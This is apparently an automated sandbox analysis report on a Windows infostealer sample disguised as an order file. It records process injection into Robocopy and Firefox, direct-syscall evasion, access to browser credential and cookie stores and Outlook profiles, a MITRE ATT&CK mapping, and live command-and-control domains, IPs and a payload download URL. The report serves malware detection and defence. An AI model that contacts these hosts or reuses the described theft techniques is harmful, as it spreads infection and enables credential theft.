Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352A3336 mov eax, dword ptr fs:[00000030h]	3_2_352A3336
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351C9303 mov eax, dword ptr fs:[00000030h]	3_2_351C9303
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351C9303 mov eax, dword ptr fs:[00000030h]	3_2_351C9303
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3528F30A mov eax, dword ptr fs:[00000030h]	3_2_3528F30A
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3525330C mov eax, dword ptr fs:[00000030h]	3_2_3525330C
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3525330C mov eax, dword ptr fs:[00000030h]	3_2_3525330C
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3525330C mov eax, dword ptr fs:[00000030h]	3_2_3525330C
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3525330C mov eax, dword ptr fs:[00000030h]	3_2_3525330C
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F332D mov eax, dword ptr fs:[00000030h]	3_2_351F332D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CE328 mov eax, dword ptr fs:[00000030h]	3_2_351CE328
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CE328 mov eax, dword ptr fs:[00000030h]	3_2_351CE328
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CE328 mov eax, dword ptr fs:[00000030h]	3_2_351CE328
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520631F mov eax, dword ptr fs:[00000030h]	3_2_3520631F
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520E363 mov eax, dword ptr fs:[00000030h]	3_2_3520E363
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520E363 mov eax, dword ptr fs:[00000030h]	3_2_3520E363
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520E363 mov eax, dword ptr fs:[00000030h]	3_2_3520E363
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520E363 mov eax, dword ptr fs:[00000030h]	3_2_3520E363
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520E363 mov eax, dword ptr fs:[00000030h]	3_2_3520E363
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520E363 mov eax, dword ptr fs:[00000030h]	3_2_3520E363
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520E363 mov eax, dword ptr fs:[00000030h]	3_2_3520E363
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520E363 mov eax, dword ptr fs:[00000030h]	3_2_3520E363
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35250371 mov eax, dword ptr fs:[00000030h]	3_2_35250371
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35250371 mov eax, dword ptr fs:[00000030h]	3_2_35250371
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3524E372 mov eax, dword ptr fs:[00000030h]	3_2_3524E372
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3524E372 mov eax, dword ptr fs:[00000030h]	3_2_3524E372
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3524E372 mov eax, dword ptr fs:[00000030h]	3_2_3524E372
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3524E372 mov eax, dword ptr fs:[00000030h]	3_2_3524E372
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351C8347 mov eax, dword ptr fs:[00000030h]	3_2_351C8347
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351C8347 mov eax, dword ptr fs:[00000030h]	3_2_351C8347
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351C8347 mov eax, dword ptr fs:[00000030h]	3_2_351C8347
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F237A mov eax, dword ptr fs:[00000030h]	3_2_351F237A
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DB360 mov eax, dword ptr fs:[00000030h]	3_2_351DB360
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DB360 mov eax, dword ptr fs:[00000030h]	3_2_351DB360
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DB360 mov eax, dword ptr fs:[00000030h]	3_2_351DB360
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DB360 mov eax, dword ptr fs:[00000030h]	3_2_351DB360
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DB360 mov eax, dword ptr fs:[00000030h]	3_2_351DB360
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DB360 mov eax, dword ptr fs:[00000030h]	3_2_351DB360
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FA390 mov eax, dword ptr fs:[00000030h]	3_2_351FA390
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FA390 mov eax, dword ptr fs:[00000030h]	3_2_351FA390
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FA390 mov eax, dword ptr fs:[00000030h]	3_2_351FA390
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3524C3B0 mov eax, dword ptr fs:[00000030h]	3_2_3524C3B0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D1380 mov eax, dword ptr fs:[00000030h]	3_2_351D1380
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D1380 mov eax, dword ptr fs:[00000030h]	3_2_351D1380
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D1380 mov eax, dword ptr fs:[00000030h]	3_2_351D1380
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D1380 mov eax, dword ptr fs:[00000030h]	3_2_351D1380

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtReadVirtualMemory: Direct from: 0x77E62DAC	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtOpenFile: Direct from: 0x77E62CEC	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtAllocateVirtualMemory: Direct from: 0x77E63BBC	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtQueryInformationToken: Direct from: 0x77E62BCC	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtNotifyChangeKey: Direct from: 0x77E63B4C	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtSetInformationProcess: Direct from: 0x77E62B7C	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtSetInformationThread: Direct from: 0x77E56319	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtReadFile: Direct from: 0x77E629FC	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtQuerySystemInformation: Direct from: 0x77E62D1C	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtMapViewOfSection: Direct from: 0x77E62C3C	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtAllocateVirtualMemory: Direct from: 0x77E62B1C	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtResumeThread: Direct from: 0x77E635CC	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtWriteVirtualMemory: Direct from: 0x77E62D5C	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtDelayExecution: Direct from: 0x77E62CFC	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtWriteVirtualMemory: Direct from: 0x77E6482C	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtCreateUserProcess: Direct from: 0x77E6363C	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtProtectVirtualMemory: Direct from: 0x77E62EBC	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtQueryInformationProcess: Direct from: 0x77E62B46	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtResumeThread: Direct from: 0x77E62EDC	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtOpenKeyEx: Direct from: 0x77E62ABC	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtQueryAttributesFile: Direct from: 0x77E62D8C	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtCreateKey: Direct from: 0x77E62B8C	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtSetInformationThread: Direct from: 0x77E62A6C	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtClose: Direct from: 0x77E62A8C
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtAllocateVirtualMemory: Direct from: 0x77E6480C	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtProtectVirtualMemory: Direct from: 0x77E57A4E	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtAllocateVirtualMemory: Direct from: 0x77E62B0C	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtOpenSection: Direct from: 0x77E62D2C	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtQueryVolumeInformationFile: Direct from: 0x77E62E4C	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtDeviceIoControlFile: Direct from: 0x77E62A0C	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtQuerySystemInformation: Direct from: 0x77E647EC	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	NtCreateFile: Direct from: 0x77E62F0C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: NULL target: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: NULL target: C:\Windows\SysWOW64\Robocopy.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: NULL target: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: NULL target: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\Robocopy.exe

Thread register set: target process: 4124

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\Robocopy.exe

Thread APC queued: target process: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Process created: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe "C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	Process created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe

0_2_0040352F

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: Yara match	File source: 00000006.00000002.10861332855.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.10261487014.0000000004820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.10261406795.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.6863945298.0000000034E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.10861889744.0000000002410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.6864836258.00000000354F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\Robocopy.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\Robocopy.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match	File source: 00000006.00000002.10861332855.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.10261487014.0000000004820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.10261406795.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.6863945298.0000000034E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.10861889744.0000000002410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.6864836258.00000000354F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	311 Process Injection	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	1 Access Token Manipulation	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
IMG_00991ORDER_FILES.exe	26%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\nsn2852.tmp\LangDLL.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsn2852.tmp\UserInfo.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsn2852.tmp\nsDialogs.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsn2852.tmp\nsExec.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://www.indeks.space/1fqp/	0%	Avira URL Cloud	safe
http://www.policydetails.online/w4ze/	0%	Avira URL Cloud	safe
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	0%	Avira URL Cloud	safe
http://www.at8l4.shop/euco/	0%	Avira URL Cloud	safe
http://nsis.sf.net/NSIS_ErrorError	0%	Avira URL Cloud	safe
http://www.vlyra.online/evtw/?AvLLLbOh=qMLUfIVxcy5BUPOFUVVokgWijQnF2zXXVKt01YDq7Fx24AU1CDxJrzkqkKWLAIZ/xY36wLggT1PRMlR6dRNA0wLKv5lzUDW7qQMZ0amG/MTffFaAFzA5nlM=&7RB=66nPyLG8	0%	Avira URL Cloud	safe
http://www.tmglift.xyz/fu44/	0%	Avira URL Cloud	safe
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD	0%	Avira URL Cloud	safe
http://www.tyai36.top/7te8/	0%	Avira URL Cloud	safe
http://www.tmglift.xyz/fu44/?AvLLLbOh=MlL7Bon/74QoG2vpxD8T9dipagYbr0R/tXGKYkMRJkwHHENkeAO2oHPD98qp5zZW/5TdXnrAZisENNCTsRHdM0U4DZ3reu4ViZt4mxUl7os1vic25L7j48U=&7RB=66nPyLG8	0%	Avira URL Cloud	safe
http://www.kapiextra.com/wRdZDseACWW137.bin	0%	Avira URL Cloud	safe
http://www.kapiextra.com/wRdZDseACWW137.binT	0%	Avira URL Cloud	safe
http://www.gopher.ftp://ftp.	0%	Avira URL Cloud	safe
http://www.theaji.shop/q3za/?AvLLLbOh=RWnANPBTnIHygAxj+74p2fQt/r+QMu+ZbRPK+z1nLy5TPZ7mlunYNOVzlFQ68L6IsvBO8bEu8tkdQ9B+wYsoyn5BHOSzYZ2Hj+i3Yz8xBJ+jGbXNJ7HrFvE=&7RB=66nPyLG8	0%	Avira URL Cloud	safe
http://www.kapiextra.com/wRdZDseACWW137.binX	0%	Avira URL Cloud	safe
http://www.bola88site.one/frol/	0%	Avira URL Cloud	safe
http://www.dom-2.online/i0bg/?AvLLLbOh=bQKVVFfanjNZBfdcIZop/p51Kq/q4DLd8P4GjEmXCojBwWm3h7h09nlNydz6D8la1AjIsgIaNvk5Cs0Spg0Y+chR33DfPPxX8Qm8eqAyl/PDJccbAQNQv5M=&7RB=66nPyLG8	0%	Avira URL Cloud	safe
http://www.tyai36.top/7te8/?AvLLLbOh=jDN4zPqbFf9yM+3zgc/bkSOt3FtgrIUvIR/YWyCTW7MfoJq2/oprJylb09/bpIujsG26CmWa4QbZN3EYlCF2dF9UrXrnLyDZVZ+LwV0bzVblUs0ijF56Mzs=&7RB=66nPyLG8	0%	Avira URL Cloud	safe
http://www.bola88site.one/frol/?AvLLLbOh=YNeTF4pSv4+M6gG3KqO7busQPotc22z/OB6yhtk01jUCobC9Y52Gmw3Z99Ir4kEoVNEa+n0iDPzrnsm9kM3Fz3qyLYlg0011pg2PCcWBraIo86SjG5d0+YE=&7RB=66nPyLG8	0%	Avira URL Cloud	safe
http://www.policydetails.online/w4ze/?7RB=66nPyLG8&AvLLLbOh=d0Jtowaj2cDKdGl/ZWixKoK2UJz0xOtSqBjDY2hG4a3QahhJ7y0n5KAnu51LUWnaBzfk1RzCzkwasvfXjgFxQ6WD3nD/I11dyUYYEHS/n2QZzV395iZlwCs=	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Avira URL Cloud	safe
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Avira URL Cloud	safe
http://www.at8l4.shop/euco/?AvLLLbOh=GPABfGdOLFG14n4QgnBiZ+BsyIvrzjVDDLyvQv6auzHiN3b/aWsmGL4J/M+2YRVr/47k2ZlpprwluvqtoYpidrJVs8sq2aKxZBcIKy6V2Ahz0rKVLGXmBGY=&7RB=66nPyLG8	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	0%	Avira URL Cloud	safe
http://www.23ddv.top/y2fc/	0%	Avira URL Cloud	safe
http://www.dom-2.online/i0bg/	0%	Avira URL Cloud	safe
http://www.23ddv.top/y2fc/?AvLLLbOh=5ZJwW+6cR+ukQX5L66hOVx0TNjHyeT2hZgA90YyTgMK9x7yRXodN7xJ1LlWJY5c/jX+OBDC/YU0F38ZFJDu2iru/QAMqsMv9PfcDIAk5SRBflopttme4W2g=&7RB=66nPyLG8	0%	Avira URL Cloud	safe
http://www.gyver.cloud/7arp/	0%	Avira URL Cloud	safe
http://www.indeks.space/1fqp/?7RB=66nPyLG8&AvLLLbOh=6qQxmJ3Ttl5RniwiWug+Nxykd+6yd18sY/lOZ1tjFrv55oSFkvFWhSP7kPUWLsM6iDX/GYi1Ud/wPB7htSWHGJqJldTcfRVJgzvdZiQtfUg3P6HLle1MpkQ=	0%	Avira URL Cloud	safe
http://www.kiristyle.shop/x85c/?AvLLLbOh=Y3mIzDGxysayARzY45AnHIIy2B4pc2sd+rPTtixWlkJfFxNC1K7RiT+8e26JUdxdhynJ2ADdGNEqJqOO4cICPBs0jMW0AIUC/yJyUu4ejJJDyAbCIM7A/9A=&7RB=66nPyLG8	0%	Avira URL Cloud	safe
http://www.kiristyle.shop/x85c/	0%	Avira URL Cloud	safe
http://www.theaji.shop/q3za/	0%	Avira URL Cloud	safe
http://www.gyver.cloud/7arp/?AvLLLbOh=dfy87afTC55YVvzS7S1jwLgcbi5w3JHzjavaxDQa19dB03jQskYCA8r/7anBB+vouT+V5ax+XjGkuRHs6us4BcBFQfXKdzJ7j1Tj8ZGM7Jn4YelEF6F15fQ=&7RB=66nPyLG8	0%	Avira URL Cloud	safe
http://www.kapiextra.com/wRdZDseACWW137.bin4	0%	Avira URL Cloud	safe
http://www.vlyra.online/evtw/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
tyai36.top	38.47.207.120	true	true	unknown
kapiextra.com	23.111.141.202	true	false	unknown
at8l4.shop	3.33.130.190	true	true	unknown
bola88site.one	172.96.191.39	true	true	unknown
www.indeks.space	194.58.112.174	true	true	unknown
www.theaji.shop	3.82.56.39	true	true	unknown
natroredirect.natrocdn.com	85.159.66.93	true	true	unknown
shops.vipshopbuy.com	35.244.245.121	true	false	unknown
policydetails.online	148.135.49.178	true	true	unknown
23ddv.top	154.23.184.218	true	true	unknown
www.dom-2.online	199.59.243.226	true	true	unknown
gyver.cloud	76.223.67.189	true	true	unknown
www.vlyra.online	203.161.42.73	true	true	unknown
